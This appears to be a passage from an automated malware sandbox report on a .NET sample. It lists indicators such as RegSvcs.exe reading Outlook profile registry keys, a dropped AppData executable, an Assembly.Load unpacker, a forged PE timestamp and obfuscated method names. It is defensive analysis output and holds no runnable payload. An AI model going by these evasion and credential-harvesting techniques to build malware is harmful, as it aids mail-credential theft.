                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, Pi1jAIH7qx7MOMF9DX.cs.Net Code: ggv2922hMn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, Pi1jAIH7qx7MOMF9DX.cs.Net Code: ggv2922hMn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, Pi1jAIH7qx7MOMF9DX.cs.Net Code: ggv2922hMn System.Reflection.Assembly.Load(byte[])
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: 0x8A4E4209 [Mon Jul 13 07:15:21 2043 UTC]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0331C348 pushad ; ret 0_2_0331C319
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0331C2A8 pushad ; ret 0_2_0331C319
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeCode function: 0_2_0331BA4C pushad ; ret 0_2_0331C319
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063E890D push es; ret 6_2_063E8920
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_025BBA4C pushad ; ret 7_2_025BC319
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5891E pushad ; iretd 11_2_00E5891F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E58C2F pushfd ; iretd 11_2_00E58C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E58DDF push esp; iretd 11_2_00E58DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636890D push es; ret 11_2_06368920
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: section name: .text entropy: 7.811214121242394
                Source: vQzHzddZ.exe.0.drStatic PE information: section name: .text entropy: 7.811214121242394
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, NkK1ZD1V0cNShE5NWM.csHigh entropy of concatenated method names: 'WU6fXjf59i', 'xIcfCBsWDE', 'mR4f9cURgI', 'NhffQuu43v', 'l0Tf8ySqdi', 'xchfm7ymYN', 'okEf7ns6Mn', 'mMxfv6hVqA', 'NPhfrHQpmC', 'OxSfpmGa0g'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, mDngjLBmVXLFQOy76F.csHigh entropy of concatenated method names: 'HnbUnCw1qX', 'eV8UIaC6We', 'YZVtT7ANCi', 'P6ctSmUJqp', 'XZyURY65FE', 'fKGUL7tdHL', 'NPlUYNFcrd', 'IjeU6VM9WQ', 'zSjUcYrmam', 'C94UAoryfD'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, DLkmFulcPLnTKv1t3f.csHigh entropy of concatenated method names: 'pwwZMxORem', 'SyVZgoW11m', 'hsoZaJ541J', 'l4dZNkuAbC', 'V7BZq1pcr3', 'QboZ5SAy8r', 'cCEZeKZV7o', 'YrrZjMfhfU', 'xLNZ1V6J7w', 'QXQZi38qFZ'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, p2mOH9eupaqhlHXdZW.csHigh entropy of concatenated method names: 'iXZfyD8gTV', 'P0BfFkCkQ8', 'i9NfsUgcAk', 'jxPsIoZORc', 'eRasz4hVjg', 'JZefTKvUte', 'QBAfS2CIGw', 'Rx9fGcNCJJ', 'rYffbD6aPR', 'EJsf2O1FnL'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, MJSZxi2lvkRKtoQEvs.csHigh entropy of concatenated method names: 'vqkSf1p8Ox', 'dbsSHHwvB8', 'RIqS3ta5ex', 'CfySKQnpoN', 'Tk3Sk6ZOnM', 'KUYSJyTHlg', 'nCVCvR0AZj9RUfsjrx', 'VseIekyo3Vr35ks9vw', 'pRqSSSdJEA', 'E3vSbPmfeS'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, wtYpfcrIqta5ex7fyQ.csHigh entropy of concatenated method names: 'FcbFQNMcJo', 'WxcFmtmrCH', 'PfgFvPCEaa', 'aSUFrwoJUa', 'uhHFkWeM96', 'YPdFJnT5iA', 'uyFFUwNOjb', 'u4xFtQ8xGS', 'TMbFZRtUxQ', 'esYFxquuk7'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, Pi1jAIH7qx7MOMF9DX.csHigh entropy of concatenated method names: 'pVnbwLcC7W', 'ccRbyl7Pi1', 'xrLbVQDYqs', 'lRFbFvLRRP', 'h2BbEPPOLR', 'Txtbs7IO6n', 'HogbfqGBRO', 'BEdbH9i1aD', 'iVfbPCIfLY', 'mpkb3Emi9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, wnMeUYMyTHlgT12COl.csHigh entropy of concatenated method names: 'gDyswrwIb8', 'RlosVyEkSA', 'YPFsE05dhQ', 'JLAsfuTJFl', 'PRcsHpL8bi', 'vu3EhpokSR', 'bPgEB1tSWg', 'CbyEoeLvP5', 'OuBEnhjvgp', 'EIEElyItIp'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, MNRHXPziKKJKIcu4nF.csHigh entropy of concatenated method names: 'ORnxm9omiC', 's52xvo8d72', 'BC1xr51mJL', 'OcJxMamAkN', 'FmIxgO31Yr', 'C8exNqJ1RK', 'OF1xqxHkkA', 'cywxOydv5D', 'N7sxXb5xDY', 'gqVxC2XR8D'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, o1p8OxvbbsHwvB8SLX.csHigh entropy of concatenated method names: 'puLV62v2rV', 'oWvVc3m1NW', 'C0yVAbLKE3', 'VY7V4k8GKT', 'LtsVhScVwo', 'DGTVBEdjaJ', 'e45VoOnepP', 'KjdVn28gki', 'X8sVlCqlA5', 'UUZVID4W9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, XpoN4Opn9ygdS4k36Z.csHigh entropy of concatenated method names: 'EQjE8pnfEG', 'zWHE77aMRC', 'P47FaSYxvY', 'Ox5FNgIFjJ', 'HuLFqn6W2V', 'JDgF5kSTCk', 'aJWFeQLOCk', 'ly5FjJEZPE', 'PiZF12gQoG', 'r28FiNk5rt'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, s6U51XSTowvXFCNmWq1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ht0xRFZWEB', 'bwAxLeiw0s', 'Lx6xYkNoHA', 'p9hx6ZDZe0', 'kxCxcW0vtq', 'BX1xAoh7BV', 'ETQx43RjO0'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, imgIInoJSm6RnLFSKT.csHigh entropy of concatenated method names: 'mgZZkda6Ok', 'qrHZUG4bNE', 'EF4ZZVMxIl', 'cjbZDx1sUH', 'CMcZdBFNhQ', 'OOlZOLqNRX', 'Dispose', 'tLTtyZ9Yc2', 'KbVtVAivQh', 'od8tFaM3EN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, mdVa9NS2MTfr3xfyGpo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NvmuZhP40Z', 'ptyuxQeYaR', 'OWBuDwKTSL', 'xZouugBMmX', 'jseudPFCSM', 'pCQu0ecvHj', 'dZNuO2Qy59'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, yVhLFn64yqbyUqfIX2.csHigh entropy of concatenated method names: 'filkitELRX', 'liukLMkqgd', 'Wa1k6klt2h', 'tY5kcdqQ7X', 'hydkgKEsuG', 'BsFkaae0iV', 'W1YkN2168E', 'mR3kquZJJa', 'xMmk52AZlT', 't0HkexuGMI'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, ixeFU3GFVNDdlZ9dry.csHigh entropy of concatenated method names: 'hHe9n8F9a', 'D65Qeekgp', 'BnEm8gpqE', 'yf47ko3dn', 'zn8rIusxB', 'SkHpoPVdE', 'PUvVx0TfNJGZkZf08n', 'tRZYwvNdp3U3dZ2maR', 'DvZtf2Z7X', 'srexlWgMN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, I445iTI8j0QC4F3s3e.csHigh entropy of concatenated method names: 'lldxFNrCa9', 'sk4xE9nGUr', 'sr8xsXMhYl', 'kTDxfetMlr', 'cyjxZlrUlh', 'ljuxHH6S37', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, cKqSNDVL3bWLLLqTO5.csHigh entropy of concatenated method names: 'Dispose', 'C6RSlnLFSK', 'DuIGgLoVZK', 'rcpmVeNvtw', 'aBySIXnRBG', 'jr8Sz9cO9Q', 'ProcessDialogKey', 'KH7GTLkmFu', 'SPLGSnTKv1', 'r3fGGa445i'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, bRoPPcSSSFWTtiTNn7a.csHigh entropy of concatenated method names: 'sVAxIiVGxl', 'FFexzJsOD8', 'iuTDTf144A', 'bLiDSkH9U3', 'xFmDG8HCkA', 'kbVDbWw4FP', 'ATiD2VrkiN', 'jlEDwUWQHP', 'OJgDysOR4S', 'nHNDVrO786'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, n9LNP9YSaR1bInK7Gh.csHigh entropy of concatenated method names: 'EiwWv75M1a', 'HfhWr1TI3N', 'IBXWM9HmCs', 'Wt0WgFdHNp', 'mSZWNOqAP3', 'LkrWqLW6bO', 'Lj0WeDnfTF', 'iYUWjuVh1x', 'BuxWi8h5Ud', 'ruHWRliNEc'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, YTyQCjgP7RfnjB53fB.csHigh entropy of concatenated method names: 'TkT4oG2upyO7flop0v1', 'QyJQ0w2j4EboRwQWZ7M', 'q4YstAVoq8', 'hhxsZhAApb', 'EWIsxF5ZrL', 'VH8Bup2oryTTJSbQIKq', 'UelCDX2C4alLcXumMEw'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, TLU8GT44lW7ULMOsp9.csHigh entropy of concatenated method names: 'vFkU3nyyfE', 'J1GUKQlVCI', 'ToString', 'XCkUyN9EUd', 'E5wUVUjJvh', 'uZhUF7EKb8', 'olfUEqx41u', 'SPrUs2w2Pa', 'VI6UfFesVc', 'iTaUHWsNM3'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, NkK1ZD1V0cNShE5NWM.csHigh entropy of concatenated method names: 'WU6fXjf59i', 'xIcfCBsWDE', 'mR4f9cURgI', 'NhffQuu43v', 'l0Tf8ySqdi', 'xchfm7ymYN', 'okEf7ns6Mn', 'mMxfv6hVqA', 'NPhfrHQpmC', 'OxSfpmGa0g'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, mDngjLBmVXLFQOy76F.csHigh entropy of concatenated method names: 'HnbUnCw1qX', 'eV8UIaC6We', 'YZVtT7ANCi', 'P6ctSmUJqp', 'XZyURY65FE', 'fKGUL7tdHL', 'NPlUYNFcrd', 'IjeU6VM9WQ', 'zSjUcYrmam', 'C94UAoryfD'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, DLkmFulcPLnTKv1t3f.csHigh entropy of concatenated method names: 'pwwZMxORem', 'SyVZgoW11m', 'hsoZaJ541J', 'l4dZNkuAbC', 'V7BZq1pcr3', 'QboZ5SAy8r', 'cCEZeKZV7o', 'YrrZjMfhfU', 'xLNZ1V6J7w', 'QXQZi38qFZ'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, p2mOH9eupaqhlHXdZW.csHigh entropy of concatenated method names: 'iXZfyD8gTV', 'P0BfFkCkQ8', 'i9NfsUgcAk', 'jxPsIoZORc', 'eRasz4hVjg', 'JZefTKvUte', 'QBAfS2CIGw', 'Rx9fGcNCJJ', 'rYffbD6aPR', 'EJsf2O1FnL'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, MJSZxi2lvkRKtoQEvs.csHigh entropy of concatenated method names: 'vqkSf1p8Ox', 'dbsSHHwvB8', 'RIqS3ta5ex', 'CfySKQnpoN', 'Tk3Sk6ZOnM', 'KUYSJyTHlg', 'nCVCvR0AZj9RUfsjrx', 'VseIekyo3Vr35ks9vw', 'pRqSSSdJEA', 'E3vSbPmfeS'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, wtYpfcrIqta5ex7fyQ.csHigh entropy of concatenated method names: 'FcbFQNMcJo', 'WxcFmtmrCH', 'PfgFvPCEaa', 'aSUFrwoJUa', 'uhHFkWeM96', 'YPdFJnT5iA', 'uyFFUwNOjb', 'u4xFtQ8xGS', 'TMbFZRtUxQ', 'esYFxquuk7'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, Pi1jAIH7qx7MOMF9DX.csHigh entropy of concatenated method names: 'pVnbwLcC7W', 'ccRbyl7Pi1', 'xrLbVQDYqs', 'lRFbFvLRRP', 'h2BbEPPOLR', 'Txtbs7IO6n', 'HogbfqGBRO', 'BEdbH9i1aD', 'iVfbPCIfLY', 'mpkb3Emi9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, wnMeUYMyTHlgT12COl.csHigh entropy of concatenated method names: 'gDyswrwIb8', 'RlosVyEkSA', 'YPFsE05dhQ', 'JLAsfuTJFl', 'PRcsHpL8bi', 'vu3EhpokSR', 'bPgEB1tSWg', 'CbyEoeLvP5', 'OuBEnhjvgp', 'EIEElyItIp'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, MNRHXPziKKJKIcu4nF.csHigh entropy of concatenated method names: 'ORnxm9omiC', 's52xvo8d72', 'BC1xr51mJL', 'OcJxMamAkN', 'FmIxgO31Yr', 'C8exNqJ1RK', 'OF1xqxHkkA', 'cywxOydv5D', 'N7sxXb5xDY', 'gqVxC2XR8D'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, o1p8OxvbbsHwvB8SLX.csHigh entropy of concatenated method names: 'puLV62v2rV', 'oWvVc3m1NW', 'C0yVAbLKE3', 'VY7V4k8GKT', 'LtsVhScVwo', 'DGTVBEdjaJ', 'e45VoOnepP', 'KjdVn28gki', 'X8sVlCqlA5', 'UUZVID4W9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, XpoN4Opn9ygdS4k36Z.csHigh entropy of concatenated method names: 'EQjE8pnfEG', 'zWHE77aMRC', 'P47FaSYxvY', 'Ox5FNgIFjJ', 'HuLFqn6W2V', 'JDgF5kSTCk', 'aJWFeQLOCk', 'ly5FjJEZPE', 'PiZF12gQoG', 'r28FiNk5rt'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, s6U51XSTowvXFCNmWq1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ht0xRFZWEB', 'bwAxLeiw0s', 'Lx6xYkNoHA', 'p9hx6ZDZe0', 'kxCxcW0vtq', 'BX1xAoh7BV', 'ETQx43RjO0'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, imgIInoJSm6RnLFSKT.csHigh entropy of concatenated method names: 'mgZZkda6Ok', 'qrHZUG4bNE', 'EF4ZZVMxIl', 'cjbZDx1sUH', 'CMcZdBFNhQ', 'OOlZOLqNRX', 'Dispose', 'tLTtyZ9Yc2', 'KbVtVAivQh', 'od8tFaM3EN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, mdVa9NS2MTfr3xfyGpo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NvmuZhP40Z', 'ptyuxQeYaR', 'OWBuDwKTSL', 'xZouugBMmX', 'jseudPFCSM', 'pCQu0ecvHj', 'dZNuO2Qy59'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, yVhLFn64yqbyUqfIX2.csHigh entropy of concatenated method names: 'filkitELRX', 'liukLMkqgd', 'Wa1k6klt2h', 'tY5kcdqQ7X', 'hydkgKEsuG', 'BsFkaae0iV', 'W1YkN2168E', 'mR3kquZJJa', 'xMmk52AZlT', 't0HkexuGMI'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, ixeFU3GFVNDdlZ9dry.csHigh entropy of concatenated method names: 'hHe9n8F9a', 'D65Qeekgp', 'BnEm8gpqE', 'yf47ko3dn', 'zn8rIusxB', 'SkHpoPVdE', 'PUvVx0TfNJGZkZf08n', 'tRZYwvNdp3U3dZ2maR', 'DvZtf2Z7X', 'srexlWgMN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, I445iTI8j0QC4F3s3e.csHigh entropy of concatenated method names: 'lldxFNrCa9', 'sk4xE9nGUr', 'sr8xsXMhYl', 'kTDxfetMlr', 'cyjxZlrUlh', 'ljuxHH6S37', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, cKqSNDVL3bWLLLqTO5.csHigh entropy of concatenated method names: 'Dispose', 'C6RSlnLFSK', 'DuIGgLoVZK', 'rcpmVeNvtw', 'aBySIXnRBG', 'jr8Sz9cO9Q', 'ProcessDialogKey', 'KH7GTLkmFu', 'SPLGSnTKv1', 'r3fGGa445i'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, bRoPPcSSSFWTtiTNn7a.csHigh entropy of concatenated method names: 'sVAxIiVGxl', 'FFexzJsOD8', 'iuTDTf144A', 'bLiDSkH9U3', 'xFmDG8HCkA', 'kbVDbWw4FP', 'ATiD2VrkiN', 'jlEDwUWQHP', 'OJgDysOR4S', 'nHNDVrO786'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, n9LNP9YSaR1bInK7Gh.csHigh entropy of concatenated method names: 'EiwWv75M1a', 'HfhWr1TI3N', 'IBXWM9HmCs', 'Wt0WgFdHNp', 'mSZWNOqAP3', 'LkrWqLW6bO', 'Lj0WeDnfTF', 'iYUWjuVh1x', 'BuxWi8h5Ud', 'ruHWRliNEc'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, YTyQCjgP7RfnjB53fB.csHigh entropy of concatenated method names: 'TkT4oG2upyO7flop0v1', 'QyJQ0w2j4EboRwQWZ7M', 'q4YstAVoq8', 'hhxsZhAApb', 'EWIsxF5ZrL', 'VH8Bup2oryTTJSbQIKq', 'UelCDX2C4alLcXumMEw'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, TLU8GT44lW7ULMOsp9.csHigh entropy of concatenated method names: 'vFkU3nyyfE', 'J1GUKQlVCI', 'ToString', 'XCkUyN9EUd', 'E5wUVUjJvh', 'uZhUF7EKb8', 'olfUEqx41u', 'SPrUs2w2Pa', 'VI6UfFesVc', 'iTaUHWsNM3'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, NkK1ZD1V0cNShE5NWM.csHigh entropy of concatenated method names: 'WU6fXjf59i', 'xIcfCBsWDE', 'mR4f9cURgI', 'NhffQuu43v', 'l0Tf8ySqdi', 'xchfm7ymYN', 'okEf7ns6Mn', 'mMxfv6hVqA', 'NPhfrHQpmC', 'OxSfpmGa0g'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, mDngjLBmVXLFQOy76F.csHigh entropy of concatenated method names: 'HnbUnCw1qX', 'eV8UIaC6We', 'YZVtT7ANCi', 'P6ctSmUJqp', 'XZyURY65FE', 'fKGUL7tdHL', 'NPlUYNFcrd', 'IjeU6VM9WQ', 'zSjUcYrmam', 'C94UAoryfD'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, DLkmFulcPLnTKv1t3f.csHigh entropy of concatenated method names: 'pwwZMxORem', 'SyVZgoW11m', 'hsoZaJ541J', 'l4dZNkuAbC', 'V7BZq1pcr3', 'QboZ5SAy8r', 'cCEZeKZV7o', 'YrrZjMfhfU', 'xLNZ1V6J7w', 'QXQZi38qFZ'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, p2mOH9eupaqhlHXdZW.csHigh entropy of concatenated method names: 'iXZfyD8gTV', 'P0BfFkCkQ8', 'i9NfsUgcAk', 'jxPsIoZORc', 'eRasz4hVjg', 'JZefTKvUte', 'QBAfS2CIGw', 'Rx9fGcNCJJ', 'rYffbD6aPR', 'EJsf2O1FnL'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, MJSZxi2lvkRKtoQEvs.csHigh entropy of concatenated method names: 'vqkSf1p8Ox', 'dbsSHHwvB8', 'RIqS3ta5ex', 'CfySKQnpoN', 'Tk3Sk6ZOnM', 'KUYSJyTHlg', 'nCVCvR0AZj9RUfsjrx', 'VseIekyo3Vr35ks9vw', 'pRqSSSdJEA', 'E3vSbPmfeS'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, wtYpfcrIqta5ex7fyQ.csHigh entropy of concatenated method names: 'FcbFQNMcJo', 'WxcFmtmrCH', 'PfgFvPCEaa', 'aSUFrwoJUa', 'uhHFkWeM96', 'YPdFJnT5iA', 'uyFFUwNOjb', 'u4xFtQ8xGS', 'TMbFZRtUxQ', 'esYFxquuk7'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, Pi1jAIH7qx7MOMF9DX.csHigh entropy of concatenated method names: 'pVnbwLcC7W', 'ccRbyl7Pi1', 'xrLbVQDYqs', 'lRFbFvLRRP', 'h2BbEPPOLR', 'Txtbs7IO6n', 'HogbfqGBRO', 'BEdbH9i1aD', 'iVfbPCIfLY', 'mpkb3Emi9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, wnMeUYMyTHlgT12COl.csHigh entropy of concatenated method names: 'gDyswrwIb8', 'RlosVyEkSA', 'YPFsE05dhQ', 'JLAsfuTJFl', 'PRcsHpL8bi', 'vu3EhpokSR', 'bPgEB1tSWg', 'CbyEoeLvP5', 'OuBEnhjvgp', 'EIEElyItIp'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, MNRHXPziKKJKIcu4nF.csHigh entropy of concatenated method names: 'ORnxm9omiC', 's52xvo8d72', 'BC1xr51mJL', 'OcJxMamAkN', 'FmIxgO31Yr', 'C8exNqJ1RK', 'OF1xqxHkkA', 'cywxOydv5D', 'N7sxXb5xDY', 'gqVxC2XR8D'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, o1p8OxvbbsHwvB8SLX.csHigh entropy of concatenated method names: 'puLV62v2rV', 'oWvVc3m1NW', 'C0yVAbLKE3', 'VY7V4k8GKT', 'LtsVhScVwo', 'DGTVBEdjaJ', 'e45VoOnepP', 'KjdVn28gki', 'X8sVlCqlA5', 'UUZVID4W9y'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, XpoN4Opn9ygdS4k36Z.csHigh entropy of concatenated method names: 'EQjE8pnfEG', 'zWHE77aMRC', 'P47FaSYxvY', 'Ox5FNgIFjJ', 'HuLFqn6W2V', 'JDgF5kSTCk', 'aJWFeQLOCk', 'ly5FjJEZPE', 'PiZF12gQoG', 'r28FiNk5rt'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, s6U51XSTowvXFCNmWq1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ht0xRFZWEB', 'bwAxLeiw0s', 'Lx6xYkNoHA', 'p9hx6ZDZe0', 'kxCxcW0vtq', 'BX1xAoh7BV', 'ETQx43RjO0'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, imgIInoJSm6RnLFSKT.csHigh entropy of concatenated method names: 'mgZZkda6Ok', 'qrHZUG4bNE', 'EF4ZZVMxIl', 'cjbZDx1sUH', 'CMcZdBFNhQ', 'OOlZOLqNRX', 'Dispose', 'tLTtyZ9Yc2', 'KbVtVAivQh', 'od8tFaM3EN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, mdVa9NS2MTfr3xfyGpo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NvmuZhP40Z', 'ptyuxQeYaR', 'OWBuDwKTSL', 'xZouugBMmX', 'jseudPFCSM', 'pCQu0ecvHj', 'dZNuO2Qy59'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, yVhLFn64yqbyUqfIX2.csHigh entropy of concatenated method names: 'filkitELRX', 'liukLMkqgd', 'Wa1k6klt2h', 'tY5kcdqQ7X', 'hydkgKEsuG', 'BsFkaae0iV', 'W1YkN2168E', 'mR3kquZJJa', 'xMmk52AZlT', 't0HkexuGMI'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, ixeFU3GFVNDdlZ9dry.csHigh entropy of concatenated method names: 'hHe9n8F9a', 'D65Qeekgp', 'BnEm8gpqE', 'yf47ko3dn', 'zn8rIusxB', 'SkHpoPVdE', 'PUvVx0TfNJGZkZf08n', 'tRZYwvNdp3U3dZ2maR', 'DvZtf2Z7X', 'srexlWgMN'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, I445iTI8j0QC4F3s3e.csHigh entropy of concatenated method names: 'lldxFNrCa9', 'sk4xE9nGUr', 'sr8xsXMhYl', 'kTDxfetMlr', 'cyjxZlrUlh', 'ljuxHH6S37', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, cKqSNDVL3bWLLLqTO5.csHigh entropy of concatenated method names: 'Dispose', 'C6RSlnLFSK', 'DuIGgLoVZK', 'rcpmVeNvtw', 'aBySIXnRBG', 'jr8Sz9cO9Q', 'ProcessDialogKey', 'KH7GTLkmFu', 'SPLGSnTKv1', 'r3fGGa445i'
